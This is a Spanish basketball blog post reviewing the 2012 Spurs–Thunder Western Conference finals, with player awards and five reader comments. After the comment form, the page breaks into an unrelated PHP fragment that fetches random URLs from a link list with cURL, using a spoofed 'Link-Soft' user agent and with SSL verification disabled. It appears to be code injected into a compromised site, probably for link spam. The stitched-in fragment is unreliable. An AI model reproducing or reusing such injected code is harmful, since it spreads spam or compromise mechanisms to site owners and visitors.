Resumen Spurs 2 – 4 Thunder

09 de June de 2012 por Sancho88

Zapatero lo llamaba geometría variable, aquel arte de asociarse con distintos sujetos en pos de alcanzar acuerdos para poder gobernar. Pues bien, aplicado al mundo baloncestístico, eso es lo que ha hecho Kevin Durant durante toda la serie. Ha aplicado cantidades ingentes de talante, y también de talento, por supuesto, para asociarse con todos sus compañeros. Mucha geométrica variable en el esquema de Brooks y Durant. Un día le tocaba a Ibaka y Perkins y al día siguiente pactaba con Westbrook y Harden para aprobar el artículo 35: “Hago lo que quiero, cuando quiero y lo que me da la gana”. Así ha gobernado durante la serie ‘Durántula’, recordando un poco a la superioridad ‘Shaquillesca’ de principios de la pasada década.

Y los Spurs se quedaron a las puertas de la gloria. Después de un comienzo fulgurante, con dos victorias consecutivas, su caída fue vertiginosa. En el tercer partido despertaron de su particular cuento de hadas, de sus 50 días con sus respectivas noches y sus 20 juegos invictos en total, y más tarde cosecharon dosis de realidad hasta ver el 4-2 en el letrero de la eliminatoria. Lo perdieron todo, 4 partidos consecutivos que duelen como cuchillos, aunque ahí quedarán los posos del buen gusto para los anales. Si este ha sido el final, se hablará siempre de un equipo que evolucionó durante distintas etapas de la liga, inaugurando ciclo en el cierre patronal del 98 con el título de los 50 partidos en temporada regular, y cerrándolo en esta temporada también de cierre patronal, de los reducidos 66 encuentros, con uno de los mejores juegos en equipo que se recuerdan en muchos años y la sensación de habernos divertido y emocionado a los amantes del buen baloncesto.

Pero los músculos jóvenes de Oklahoma City se impusieron finalmente y se llevaron el trofeo de la Conferencia Oeste remontando desde la nada para llegar hasta las finales de la NBA. Solo tres equipos habían logrado levantar un 2-0 en la historia de las finales de conferencia, y ahora los Thunder se convierten en el cuarto. No obstante, esa pequeña muesca en la historia les sabrá a poco seguramente, teniendo en cuenta el plato mayor que les espera a partir de ahora. La pregunta sería si no hubiera sido aún más emocionante la remontada de haber terciado un séptimo partido a vida o muerte. Pero la respuesta sería con mucha seguridad que no. Sencillamente, porque a partir del tercer partido la serie fue un clon de sí misma. Los Spurs empezaban los partidos ganando cómodamente, con Tony Parker y Tim Duncan haciendo dueto de cuerdas, y la barrera de los 25 puntos colmada con relativa facilidad. Después Oklahoma se ponía a defender, aparecía el Sefolosha, Perkins, Ibaka, Fisher o Cook de turno con sus porcentajes escandalosos, imposibles, hasta casi de récord (como el 11 de 11 de Ibaka en el cuarto de la serie) y de la mano de esta segunda unidad más el genuino James Harden, los Thunder igualaban las tornas. Más tarde, Westbrook solía aparecer con sus rachas de tiro en la segunda mitad y el jefe Durant se desperezaba para matar el encuentro con sospechas extraterrestres bastante fundadas sobre su tremenda eficacia. Hay gente que comenta que en realidad Durant es un robot dirigido por computadora en modo leyenda en ‘My player’. Su calificación no puede ser otra que la de A+.

En resumen, Oklahoma comenzó a jugar su mejor basket cuando se vio contra las cuerdas, como nunca lo había estado ni contra Mavericks ni contra Lakers en las primeras eliminatorias. La incomprensible ausencia de Serge Ibaka durante el último cuarto del primer partido se corrigió en los siguientes encuentros y pudimos ver a un pívot sólido que dominó la serie como nadie. Además, Westbrook, de quien se sospecha continuamente por no saber ordenar al equipo (algo que demostró en los dos primeros partidos de la serie), ofreció mejores prestaciones hasta doblar casi su media de asistencias a partir del tercer partido, y seleccionó mucho mejor sus lanzamientos desde la línea de triple. Durante el cuarto y quinto juego dio una lección de dirección, aunque en el global de la eliminatoria no fue tan decisivo como Durant, ni mucho menos. Los Thunder jugaron como un equipo y llegan a la final de la NBA como favoritos, ya sea para jugar contra los Heat o para vérselas con los orgullosos verdes.

Premios

MVP: Kevin Durant. Su aportación no ha parado de crecer durante los Playoffs y en estas finales ha firmado sus mejores números, promediando prácticamente 30 puntos por partido, además de 8 rebotes y 5 asistencias. Bajó sus porcentajes en triples pero en el global, firmó un estupendo 53% en tiros de campo que resultó letal para los Spurs.

Decepción: Greg Popovich. Cuando de verdad tenía que implicar a sus jugadores, hizo ‘la de Javi Clemente’. Vieja guardia, me emponzoño en la antigüedad y todo lo que he trabajado durante el año con Blair, Green, Bonner, Leonard e incluso Splitter lo tiro al camión de la basura. Ya no me vale. Ataque de entrenador en toda regla y totalmente sobrepasado por el señor que habitaba en el otro banquillo: Scott Brooks. No sabemos cómo pretendía ganar al equipo más físico de la liga jugando con 8 tíos nada más, en vez de utilizar su vasta rotación que le ha dado tan buenos resultados durante la temporada, incluso en los partidos que disputó contra los Thunder. Bastante incomprensible también situar a Boris Diaw de ‘5’ cuando no estaba Duncan en pista y jugar con 4 pequeños, sobre todo porque Blair demostró en el segundo partido que podía asumir responsabilidades jugando junto a otro poste. En vez de esto, el otrora pívot titular del equipo durante la temporada, apenas jugó 5 minutos por partido. 0 confianza en los demás por parte de Popovich y planteamiento suicida teniendo en cuenta el nivel ofensivo que han demostrado durante la serie los pívots de Oklahoma. Además, se pasó todo el sexto partido reprochando a sus jugadores toda clase de errores, mientras él permanecía sentado sin tomar ninguna decisión para cambiar la situación. Pero no podemos delegar todas las culpas en el mejor entrenador del año, ni mucho menos. El propio Danny Green, y sobre todo Tiago Splitter, dieron bastantes pasos hacia atrás y nada se supo de ellos durante la serie. Green supuestamente era el anti Westbrook y Splitter el hombre para dar relevos de calidad a Tim Duncan. La realidad puso a todos en su lugar y estos dos hombres volvieron a ser niños durante la eliminatoria.

Sorpresa: Stephen Jackson. Cuando uno llega a cierta edad, ve los millones que ha ‘amasado’, ve el pisazo de lujo, el perro pequinés, la termomix, la play 3, etc., es posible que se deje llevar, pero S-Jax ha renegado de su posición privilegiada como veterano, demostrando durante la serie un instinto ganador fuera de toda duda y, sobre todo, que puede ser aprovechable para un equipo con aspiraciones al anillo. Quién lo diría, cuando hace unos meses ni jugaba en los Bucks por culpa de otro entrenador intransigente, en este caso Scott Skiles. Jackson no se arredró en ninguno de los partidos, fue el anti-Durant (o al menos hizo lo que pudo contra él) y nos recordó sus mejores exhibiciones personales en el último partido anotando 6 triples de 7 intentos para un total de 23 puntos, además de firmar unas medias de anotación de 12 puntos y casi un 70% de efectividad en triples y en tiros de campo durante las finales.

Esfuerzo en vano: Tony Parker. Sus 22 puntos y 6 asistencias por partido quedan ensombrecidos por la sensación de que no sirvieron en demasía para mover a su equipo, para integrar al resto de compañeros. Ginobili y Duncan también aportaron, por supuesto, y si Parker lo intentó todo en el último partido, Manu hizo lo mismo en el quinto, y Duncan fue el único que se pegó contra la pintura de los Thunder durante toda la serie, superando además el record de tapones en playoffs de Kareem Abdul-Jabbar con 477 (y subiendo). Pero Parker fue la referencia, el motor, el termostato de estos Spurs. Cuando él estuvo bien, los Spurs estuvieron bien, pero cuando él desapareció, todo el equipo se hundió también con él. Algo se truncó en la magia de San Antonio, y ahora están en sus casas preparando las vacaciones. Como diría aquel… ¡Nasty de plasty!

Comenta

5 comentarios a esta entrada

  1. arvydas dice:
    #1

    Gran análisis. Nada mas que añadir.
    Solo felicitarte Sancho.
    Plas plas plas….

      Citar

  2. Sancho88 dice:
    #2

    Gracias arvydas!! Por cierto, lógicamente tb fue gran sorpresa lo de Sefolosha, por su tercer partido de la serie con los 19 puntos y 6 robos, si no me equivoco, con su gran defensa sobre Tony Parker, sobre Manu Ginobili, en fin, sobre quien le pusieran, además de los pívots de Oklahoma: Ibaka, Perkins y Collison. Les comieron la tostada como quisieron a los pívots de San Antonio en ambas partes de la cancha ganándoles la posición tanto en el poste bajo como en el poste alto. Fueron inexistentes las ayudas en penetración o en el 1×1 de los pívots de San Antonio, lentos hasta decir basta en el desplazamiento, y en definitiva, Thunder movieron rápido y bien la bola y los Spurs no fueron agresivos atrás, bajaron muy mal a defender en transición (hasta Kendrick Perkins llegó a montar un contraataque subiendo la bola), y a partir del tercer juego dejaron de lado su fórmula mágica del juego en equipo. Ahí perdieron la eliminatoria, por desesperación y falta de ambición defensiva. Por su parte, la defensa de Oklahoma cuando se puso seria secó totalmente el ataque de Spurs. Han funcionado como una maquinaria perfectamente engrasada

      Citar

  3. nba dice:
    #3

    Respecto a los Spurs habria que decir, y ahora que ??

      Citar

  4. Rompe dice:
    #4

    nba:
    Respectoa los Spurs habria que decir, y ahora que ??

    Llevamos ya unos años en los que, cuando caen los Spurs, formulamos esa misma pregunta. Y lo cierto es que en los dos últimos años han sido los mejores de su conferencia en la Regular. El año que viene no espero menos que verlos luchar por lo mismo. En PO, quién sabe… Por momento este año fueron los favoritos indiscutibles… Alguien se atreve a enterrarlos?

      Citar

  5. GreenPride dice:
    #5

    Vuelco espectacular e histórico en esta eliminatoria. San Antonio venía de realizar 2 meses y pico de competición simplemente perfectos, con la moral por las nubes, todos los jugadores implicados y un juego de ataque coral que levantaba admiración en todo el mundo hasta el final del segundo partido. Una vez ahí, los jóvenes y hambrientos Thunder ajustaron y los Spurs cayeron y cayeron sin remedio.
    Totalmente de acuerdo con la crónica en la decepción pero compartida a medias con los jugadores que la causaron. Popovich tiró de la vieja guardia en los momentos decisivos y redujo su rotación a 8 jugadores pero es que alguno de los que eliminó jugó realmente mal sobrepasado por la eliminatoria y la defensa de los Thunder. Green fue una sombra, Splitter no dió una, Diaw no se ganó los muchos minutos que jugó y a otros como Blair o Bonner el marine Pop no les dió opción. Lo que todos alabábamos de un equipo con infinitas opcionesy jugadores quedó reducido al trío de ases Parker, Ginobilli, Duncan más aportaciones de Leonard y S-Jax que jugó unas grandes series y con esto no les dió frente a los Thunder.
    Por los Thunder, decir que se han doctorado en estas series es poco. Gran ejercicio de dureza mental, de sabiduría, de saber estar en unos PO. Durant asumiendo galones, decidiendo partidos, sin precipitaciones, esperando sus momentos para lanzar con grandes porcentajes. Y junto a él un gran equipo con Ibaka y Sefolosha cumpliendo magníficamente, Collison aportando defensa y puntos de vez en cuando y sobre todo Westbrook muy mejorado (aunque aún le sobren algunos tiros y entradas a lo loco) y un Harden fenomenal, dominador de la situación y ayudando a Durantula en los momentos calientes. Gran defensa interior a Duncan al que minimizaron en ataque la mayoría de la serie y un vigor físico que les va a ser muy necesario ahora en las finales.
    El nuevo mundo ha llegado definitivamente a la NBA con Lakers, Spurs y Celtics fuera de las finales por segundo año consecutivo. ¡El Rey ha muerto! ¡Viva el Rey!…. y ahora veremos si el verdadero rey es Durant o LeBron….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>